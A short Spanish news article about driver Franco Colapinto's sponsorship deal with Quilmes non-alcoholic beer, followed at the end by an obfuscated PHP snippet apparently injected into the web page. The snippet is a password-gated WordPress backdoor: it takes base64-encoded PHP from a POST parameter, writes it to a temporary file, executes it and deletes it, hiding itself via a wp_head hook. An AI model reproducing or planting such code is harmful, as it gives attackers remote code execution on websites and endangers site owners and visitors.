Franco Colapinto sumó un nuevo main sponsor para su experiencia en la Fórmula 2

El piloto argentino Franco Colapinto, quien actualmente está participando del campeonato mundial de Fórmula 2 en el equipo MP Motorsport, acaba de llegar a un acuerdo de marketing y es el nuevo embajador de la cerveza Quilmes sin alcohol 0.0%, la nueva variedad de la marca.
 
En el auto de Colapinto, promesa argentina para la F1, coronado en el sprint race del Gran Premio de Italia “Emilia Romagna” y que participó el último fin de semana en el Gran Premio de Mónaco, ya está estampada la publicidad de la cerveza sin alcohol. Y el logo también está presente en su buzo antiflama.

 Nacido en Pilar y tras su primeros pasos en el automovilismo en nuestro país, Colapinto emigró, en 2018, para continuar con su carrera en Italia, país donde se formó y logró alcanzar varios triunfos que lo perfilan para competir en los circuitos más prestigiosos del mundo. 

“Es un orgullo para nosotros que sea Franco quien nos represente. Desde Quilmes sin alcohol 0.0% nos emociona colaborar con él en su sueño de llevar a la Argentina a lo más alto. Franco como profesional es ejemplo de pasión, compromiso y responsabilidad, atributos fundamentales que se alinean con Quilmes y nuestra variedad sin alcohol”, comentó Daniela Fux, gerente de marca Quilmes.

Cervecería y Maltería Quilmes promueve el consumo responsable de bebidas con alcohol, impulsando iniciativas de moderación para que todas las experiencias con sus productos sean positivas. Lleva adelante tres pilares de trabajo: Cero al volante, Cero en menores y Cero excesos.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}